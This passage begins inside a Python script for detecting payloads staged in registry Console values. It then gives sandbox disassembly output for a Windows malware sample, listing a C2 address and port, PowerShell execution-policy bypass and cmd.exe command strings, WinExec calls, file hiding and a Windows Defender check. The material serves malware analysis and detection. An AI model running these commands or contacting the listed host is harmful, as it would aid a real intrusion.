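[HKEY_CURRENT_USER\Console\%SystemRoot%_system32_cmd.exe]
"FaceName"="Consolas"

[HKEY_CURRENT_USER\Console\0]
"9e9e85e05ee16fc372a0c7df6549fbd4"=hex:de,ad,be,ef,00,01,02,03,\
  04,05,06,07
"0d3b34577c0a66584d5bdc849e214016"=hex:01,02,03
"Comment"="a plain string value is not a staged blob"
"""

if __name__ == "__main__":
    for hit in find_staged_payloads(SAMPLE_REG_EXPORT):
        print(hit)
```

The size and first bytes are reported rather than the blob itself because the stored data is what the loader decrypts or unpacks in memory; dump it with `reg export` and carve it separately rather than trusting a signature on the raw value.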

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 664 1000b570-1001164a call 10017290 call 10002da0 call 10005540 call 10001cd0 call 10011770 call 10012640 call 10001cd0 call 10011770 call 10012640 call 10005400 * 2 call 10002ec0 * 2 call 10004fe0 call 10002cd0 call 10002cb0 call 10004fe0 call 10002cd0 call 10002cb0 call 100054b0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10012620 call 10002e20 call 10005250 call 10001cd0 call 10011770 call 10012640 call 10005400 call 100138d0 call 10002cb0 call 10012620 call 10002b60 call 10005520 call 10002b60 call 10002da0 call 10005300 call 10002cb0 Sleep call 10002b60 call 10002da0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10002e20 call 10005250 call 10002cb0 call 10012620 call 10002cb0 call 10002b60 call 10002da0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10002e20 call 10005250 call 10002cd0 call 10002cb0 * 2 call 10012620 call 10002cb0 call 100139a0 call 10013a30 * 11 call 10002cb0 * 11 call 10002b60 call 10005520 call 10002b60 call 10002da0 call 10005300 call 10002cb0 Sleep call 10001cd0 call 10011770 call 10012640 call 10005400 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10013890 call 10002cb0 call 10012620 call 10002cb0 call 10012620 call 10002b60 WinExec call 10001cd0 call 10011770 call 10012640 call 10005400 call 10012620 call 10002b60 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10003bc0 call 10003b90 call 10002cd0 call 10002cb0 * 3 call 10012620 call 10002b60 WinExec Sleep call 10002b60 call 10002da0 call 10005740 call 10002cb0 call 10002b60 call 10002da0 call 10005740 call 10002cb0 call 10002b60 call 10005520 call 10002b60 call 10005520 940 1001164f-10011768 call 10002cb0 * 12 call 10012620 * 2 call 10002cb0 * 2 664->940
                                                                                    APIs
                                                                                      • Part of subcall function 10005540: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10005573
                                                                                      • Part of subcall function 10005540: Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 10005672
                                                                                    • _Smanip.LIBCPMTD ref: 1000BC01
                                                                                    • _Smanip.LIBCPMTD ref: 1001051C
                                                                                      • Part of subcall function 10005400: HandleT.LIBCPMTD ref: 1000546A
                                                                                    • _Smanip.LIBCPMTD ref: 1001073A
                                                                                    • _Smanip.LIBCPMTD ref: 1001084B
                                                                                      • Part of subcall function 10005520: DeleteFileA.KERNEL32(1000A58A,?,1000A58A,00000000,?,?,?,0000005C,?), ref: 10005527
                                                                                      • Part of subcall function 10005300: ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000022,00000040,00000001), ref: 1000534A
                                                                                      • Part of subcall function 10005300: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(1000A5BB,000000FF,?), ref: 10005384
                                                                                      • Part of subcall function 10005300: SetFileAttributesA.KERNEL32(00000000,00000001), ref: 100053A0
                                                                                    • Sleep.KERNEL32(000000C8,?,00000000,?,?,?,?,0000005C,?), ref: 10010947
                                                                                    • _Smanip.LIBCPMTD ref: 100109A4
                                                                                    • _Smanip.LIBCPMTD ref: 10010AD8
                                                                                    • Sleep.KERNEL32(000000C8,?,00000000), ref: 10010EF0
                                                                                    • _Smanip.LIBCPMTD ref: 1001111B
                                                                                    • _Smanip.LIBCPMTD ref: 100111D8
                                                                                    • WinExec.KERNEL32 ref: 100112B2
                                                                                    • _Smanip.LIBCPMTD ref: 100113C7
                                                                                    • _Smanip.LIBCPMTD ref: 10011483
                                                                                    • WinExec.KERNEL32 ref: 100115A4
                                                                                    • Sleep.KERNEL32(00007530,?,?,?,?,?,?,00000063,?,00000070,?,?,?,?,00000063,?), ref: 100115AF
                                                                                      • Part of subcall function 10005740: SetFileAttributesA.KERNEL32(00000000,00000080,?,1000B3D6,?,00000000), ref: 10005751
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Smanip$File$Sleep$AttributesExec$?write@?$basic_ostream@Bios_base@std@@Concurrency::task_continuation_context::task_continuation_contextD@std@@@std@@DeleteHandleModuleNameU?$char_traits@V12@
                                                                                    • String ID: .NET Framework NGEN v4.0.30320$\PolicyManagement.xml$cmd.exe /C $cmd.exe /C $powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"$powershell -ExecutionPolicy Bypass -File
                                                                                    • API String ID: 4257096594-523289145
                                                                                    • Opcode ID: 9e45987f3798403d8cc5d3410866f261607f01cdd5ae5bd5fae8056e3af5addb
                                                                                    • Instruction ID: 1d7400057bebe3c6382eebc75725cfde9b6fd82cf2fffe0597d68cd537529047
                                                                                    • Opcode Fuzzy Hash: 9e45987f3798403d8cc5d3410866f261607f01cdd5ae5bd5fae8056e3af5addb
                                                                                    • Instruction Fuzzy Hash: 66D35B50D0D6E8C9EB22C2288C587DDBEA55B22749F4441D9819C2A283C7FF1FD9CF66

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 100154B3
                                                                                    • getaddrinfo.WS2_32(154.82.85.107,18852,?,00000000), ref: 100154FA
                                                                                    • WSACleanup.WS2_32 ref: 10015509
                                                                                    • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10015511
                                                                                    • socket.WS2_32(?,?,?), ref: 10015552
                                                                                    • WSACleanup.WS2_32 ref: 10015566
                                                                                    • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 1001556E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cleanupexit$Startupgetaddrinfosocket
                                                                                    • String ID: 154.82.85.107$18852
                                                                                    • API String ID: 2357443324-1825080259
                                                                                    • Opcode ID: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                    • Instruction ID: 8ea8c21000931f3664100cedd98eebcd754df86da53339749fb4ddc4d9d3f251
                                                                                    • Opcode Fuzzy Hash: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                    • Instruction Fuzzy Hash: 576128B5904629EFE704DFA4CC88F9DB7B5FB08306F148219E519AB2A0C775DA80CF65

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _Smanip.LIBCPMTD ref: 1001073A
                                                                                      • Part of subcall function 10005400: HandleT.LIBCPMTD ref: 1000546A
                                                                                    • _Smanip.LIBCPMTD ref: 1001084B
                                                                                      • Part of subcall function 10005520: DeleteFileA.KERNEL32(1000A58A,?,1000A58A,00000000,?,?,?,0000005C,?), ref: 10005527
                                                                                      • Part of subcall function 10005300: ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000022,00000040,00000001), ref: 1000534A
                                                                                      • Part of subcall function 10005300: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(1000A5BB,000000FF,?), ref: 10005384
                                                                                      • Part of subcall function 10005300: SetFileAttributesA.KERNEL32(00000000,00000001), ref: 100053A0
                                                                                    • Sleep.KERNEL32(000000C8,?,00000000,?,?,?,?,0000005C,?), ref: 10010947
                                                                                    • _Smanip.LIBCPMTD ref: 100109A4
                                                                                    • _Smanip.LIBCPMTD ref: 10010AD8
                                                                                    • Sleep.KERNEL32(000000C8,?,00000000), ref: 10010EF0
                                                                                    • _Smanip.LIBCPMTD ref: 1001111B
                                                                                    • _Smanip.LIBCPMTD ref: 100111D8
                                                                                    • WinExec.KERNEL32 ref: 100112B2
                                                                                    • _Smanip.LIBCPMTD ref: 100113C7
                                                                                    • _Smanip.LIBCPMTD ref: 10011483
                                                                                    • WinExec.KERNEL32 ref: 100115A4
                                                                                    • Sleep.KERNEL32(00007530,?,?,?,?,?,?,00000063,?,00000070,?,?,?,?,00000063,?), ref: 100115AF
                                                                                      • Part of subcall function 10005740: SetFileAttributesA.KERNEL32(00000000,00000080,?,1000B3D6,?,00000000), ref: 10005751
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Smanip$FileSleep$AttributesExec$?write@?$basic_ostream@Bios_base@std@@D@std@@@std@@DeleteHandleU?$char_traits@V12@
                                                                                    • String ID: \PolicyManagement.xml$cmd.exe /C $cmd.exe /C $powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"$powershell -ExecutionPolicy Bypass -File
                                                                                    • API String ID: 2403214002-703889769
                                                                                    • Opcode ID: 95c285ceadc03ba962dc335a14688626ae0374982d28f6f54252d4d4ce3d691d
                                                                                    • Instruction ID: 89a6048f31c0d9b9dc8eed6deba1614e217759769de3e834a74d5456fb66c3b8
                                                                                    • Opcode Fuzzy Hash: 95c285ceadc03ba962dc335a14688626ae0374982d28f6f54252d4d4ce3d691d
                                                                                    • Instruction Fuzzy Hash: 79B23B75C08298DAEB25CBA8CC45BDEBBB1AF15304F0441D9D14D67292DBB52B88CF62

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • ResetEvent.KERNEL32(?), ref: 02712D9B
                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 02712DA7
                                                                                    • timeGetTime.WINMM ref: 02712DAD
                                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 02712DDA
                                                                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02712E06
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02712E12
                                                                                    • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 02712E31
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02712E3D
                                                                                    • gethostbyname.WS2_32(00000000), ref: 02712E4B
                                                                                    • htons.WS2_32(?), ref: 02712E6D
                                                                                    • connect.WS2_32(?,?,00000010), ref: 02712E8B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                    • String ID: 0u
                                                                                    • API String ID: 640718063-3203441087
                                                                                    • Opcode ID: bf54ab78a635b82786b1d67d9feaf3a3facb303badc60f5b0f2d216ffb98c486
                                                                                    • Instruction ID: f0e76c9f097766be7ebdac88d725913a4bc82d495d79ff6ff94a7ee23d4420a3
                                                                                    • Opcode Fuzzy Hash: bf54ab78a635b82786b1d67d9feaf3a3facb303badc60f5b0f2d216ffb98c486
                                                                                    • Instruction Fuzzy Hash: 3E6152B1A40304AFE724DFA8DC45FAAB7B9FF48710F504619FA46A72C0D7B0A904CB65

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • ResetEvent.KERNEL32(?), ref: 03072DBB
                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 03072DC7
                                                                                    • timeGetTime.WINMM ref: 03072DCD
                                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 03072DFA
                                                                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 03072E26
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03072E32
                                                                                    • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 03072E51
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03072E5D
                                                                                    • gethostbyname.WS2_32(00000000), ref: 03072E6B
                                                                                    • htons.WS2_32(?), ref: 03072E8D
                                                                                    • connect.WS2_32(?,?,00000010), ref: 03072EAB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                    • String ID: 0u
                                                                                    • API String ID: 640718063-3203441087
                                                                                    • Opcode ID: 60d5030235294248ba38c0ddeeeba06d29389df4dc07966597ea558cc7c68678
                                                                                    • Instruction ID: fc034aa22d5c4ca023ea172153e623c84faa2ec27eb1db378dd8e74da381f061
                                                                                    • Opcode Fuzzy Hash: 60d5030235294248ba38c0ddeeeba06d29389df4dc07966597ea558cc7c68678
                                                                                    • Instruction Fuzzy Hash: 80616171A41308BFD720EFA4DC45FAAB7BCFF48B10F10451AF655AB290D674A9048B64

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetCurrentProcessId.KERNEL32(75BF73E0), ref: 03076A94
                                                                                    • wsprintfW.USER32 ref: 03076AA7
                                                                                      • Part of subcall function 03076910: GetCurrentProcessId.KERNEL32(2DB1A981,00000000,00000000,75BF73E0,?,00000000,030910DB,000000FF,?,03076AB3,00000000), ref: 03076938
                                                                                      • Part of subcall function 03076910: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,030910DB,000000FF,?,03076AB3,00000000), ref: 03076947
                                                                                      • Part of subcall function 03076910: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,030910DB,000000FF,?,03076AB3,00000000), ref: 03076960
                                                                                      • Part of subcall function 03076910: CloseHandle.KERNEL32(00000000,?,00000000,030910DB,000000FF,?,03076AB3,00000000), ref: 0307696B
                                                                                    • _memset.LIBCMT ref: 03076AC2
                                                                                    • GetVersionExW.KERNEL32(?), ref: 03076ADB
                                                                                    • GetCurrentProcess.KERNEL32(00000008,?), ref: 03076B12
                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 03076B19
                                                                                    • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 03076B3F
                                                                                    • GetLastError.KERNEL32 ref: 03076B49
                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 03076B5D
                                                                                    • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 03076B85
                                                                                    • GetSidSubAuthorityCount.ADVAPI32 ref: 03076B98
                                                                                    • GetSidSubAuthority.ADVAPI32(00000000), ref: 03076BA6
                                                                                    • LocalFree.KERNEL32(?), ref: 03076BB5
                                                                                    • CloseHandle.KERNEL32(?), ref: 03076BC2
                                                                                    • wsprintfW.USER32 ref: 03076C1B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
                                                                                    • String ID: -N/$NO/$None/%s
                                                                                    • API String ID: 3036438616-3095023699
                                                                                    • Opcode ID: cad77c8fc20be4e859fed33f70f0594f4b0f748b1522d2c65c0f04b2b4f20312
                                                                                    • Instruction ID: ab172de789670cb7c06c4ec83d4a34386504d70e2f41c74bb805c0c84eb0763b
                                                                                    • Opcode Fuzzy Hash: cad77c8fc20be4e859fed33f70f0594f4b0f748b1522d2c65c0f04b2b4f20312
                                                                                    • Instruction Fuzzy Hash: F041C470D0361CAFDB64EB61CC88FEE77BCEB4A304F044496F6069A141DA36D994CBA5

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Console,00000000,00020019,?), ref: 0307AD53
                                                                                    • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0307AD73
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: OpenQueryValue
                                                                                    • String ID: %s_bin$Console$Console\0$IpDatespecial
                                                                                    • API String ID: 4153817207-1338088003
                                                                                    • Opcode ID: a23e2dc8eed72f4c825e27514fdc982d40844e70ae61f4d06c60bd5c12614a42
                                                                                    • Instruction ID: 3dd7084fb71e0fd80a53f9b992520c9703abbbe30046f89017acc762620d4e03
                                                                                    • Opcode Fuzzy Hash: a23e2dc8eed72f4c825e27514fdc982d40844e70ae61f4d06c60bd5c12614a42
                                                                                    • Instruction Fuzzy Hash: 91C1F1B1E02301ABE710EF24DC45FAB73E8BF94704F080569E9499B381E675E915C7A6

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1448 3076150-30761a5 call 3086770 call 308004b 1453 30761a7-30761ae 1448->1453 1454 3076201-3076228 CoCreateInstance 1448->1454 1455 30761b0-30761b2 call 3076050 1453->1455 1456 3076422-307642f lstrlenW 1454->1456 1457 307622e-3076282 1454->1457 1461 30761b7-30761b9 1455->1461 1459 3076441-3076450 1456->1459 1460 3076431-307643b lstrcatW 1456->1460 1468 307640a-3076418 1457->1468 1469 3076288-30762a2 1457->1469 1462 3076452-3076457 1459->1462 1463 307645a-307647a call 307f00a 1459->1463 1460->1459 1465 30761db-30761ff call 308004b 1461->1465 1466 30761bb-30761d9 lstrcatW * 2 1461->1466 1462->1463 1465->1454 1465->1455 1466->1465 1468->1456 1470 307641a-307641f 1468->1470 1469->1468 1475 30762a8-30762b4 1469->1475 1470->1456 1476 30762c0-3076363 call 3086770 wsprintfW RegOpenKeyExW 1475->1476 1479 30763e9-30763ff 1476->1479 1480 3076369-30763ba call 3086770 RegQueryValueExW 1476->1480 1482 3076402-3076404 1479->1482 1484 30763dc-30763e3 RegCloseKey 1480->1484 1485 30763bc-30763da lstrcatW * 2 1480->1485 1482->1468 1482->1476 1484->1479 1485->1484
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0307618B
                                                                                    • lstrcatW.KERNEL32(030A1F10,0309510C,?,2DB1A981,00000AD4,00000000,75BF73E0), ref: 030761CD
                                                                                    • lstrcatW.KERNEL32(030A1F10,0309535C,?,2DB1A981,00000AD4,00000000,75BF73E0), ref: 030761D9
                                                                                    • CoCreateInstance.OLE32(03092480,00000000,00000017,0309578C,?,?,2DB1A981,00000AD4,00000000,75BF73E0), ref: 03076220
                                                                                    • _memset.LIBCMT ref: 030762CE
                                                                                    • wsprintfW.USER32 ref: 03076336
                                                                                    • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 0307635F
                                                                                    • _memset.LIBCMT ref: 03076376
                                                                                      • Part of subcall function 03076050: _memset.LIBCMT ref: 0307607C
                                                                                      • Part of subcall function 03076050: CreateToolhelp32Snapshot.KERNEL32 ref: 03076088
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _memset$Createlstrcat$InstanceOpenSnapshotToolhelp32wsprintf
                                                                                    • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                                                                    • API String ID: 1221949200-1583895642
                                                                                    • Opcode ID: b1e57abc67e97b1b4188b789ee13b6cfb5f29a613a1028836fb31880505d6b31
                                                                                    • Instruction ID: 26226088bfef6c5f3498ef60b8fea06ffab35cff9729d1c10be6975178149320
                                                                                    • Opcode Fuzzy Hash: b1e57abc67e97b1b4188b789ee13b6cfb5f29a613a1028836fb31880505d6b31
                                                                                    • Instruction Fuzzy Hash: 7B8193B1A02628AFDB24DB54CC40FAEB7B8EB48704F0445C9F719AB142D6759A41CFA8

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1486 40c490-40c4b9 call 4087fc 1489 40c4d0-40c4e5 call 4097c8 call 40bcc4 1486->1489 1490 40c4bb-40c4ce GetModuleFileNameW 1486->1490 1491 40c4ea-40c4f2 1489->1491 1490->1491 1494 40c4f8-40c519 RegOpenKeyExW 1491->1494 1495 40c69f-40c6b4 call 408718 1491->1495 1498 40c5b9-40c5f3 call 40c2a0 RegQueryValueExW 1494->1498 1499 40c51f-40c53b RegOpenKeyExW 1494->1499 1507 40c5f5-40c626 call 405490 RegQueryValueExW call 40982c 1498->1507 1508 40c628-40c642 RegQueryValueExW 1498->1508 1499->1498 1500 40c53d-40c559 RegOpenKeyExW 1499->1500 1500->1498 1503 40c55b-40c577 RegOpenKeyExW 1500->1503 1503->1498 1506 40c579-40c595 RegOpenKeyExW 1503->1506 1506->1498 1509 40c597-40c5b3 RegOpenKeyExW 1506->1509 1511 40c673-40c684 1507->1511 1508->1511 1512 40c644-40c66e call 405490 RegQueryValueExW call 40982c 1508->1512 1509->1495 1509->1498 1516 40c686-40c689 call 4054ac 1511->1516 1517 40c68e-40c697 RegCloseKey 1511->1517 1512->1511 1516->1517
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040C6B5,?,?), ref: 0040C4C9
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040C6B5,?,?), ref: 0040C512
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040C6B5,?,?), ref: 0040C534
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040C552
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040C570
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040C58E
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040C5AC
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040C698,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040C6B5), ref: 0040C5EC
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040C698,?,80000001), ref: 0040C617
                                                                                    • RegCloseKey.ADVAPI32(?,0040C69F,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040C698,?,80000001,Software\Embarcadero\Locales), ref: 0040C692
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Open$QueryValue$CloseFileModuleName
                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                                    • API String ID: 2701450724-3496071916
                                                                                    • Opcode ID: ec5a7b2449134f7d5dfed0d4a478582841b94be27ba8f16343ce714d667d3cea
                                                                                    • Instruction ID: b87a276e91c0abd92e6ddb5251d81d319347be4625686c9aa575414df8f97b10
                                                                                    • Opcode Fuzzy Hash: ec5a7b2449134f7d5dfed0d4a478582841b94be27ba8f16343ce714d667d3cea
                                                                                    • Instruction Fuzzy Hash: B251F575A50208FEDB20EB95CC82FAE77ECDB08704F5045BBB604F62C1D6789A449B5D

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
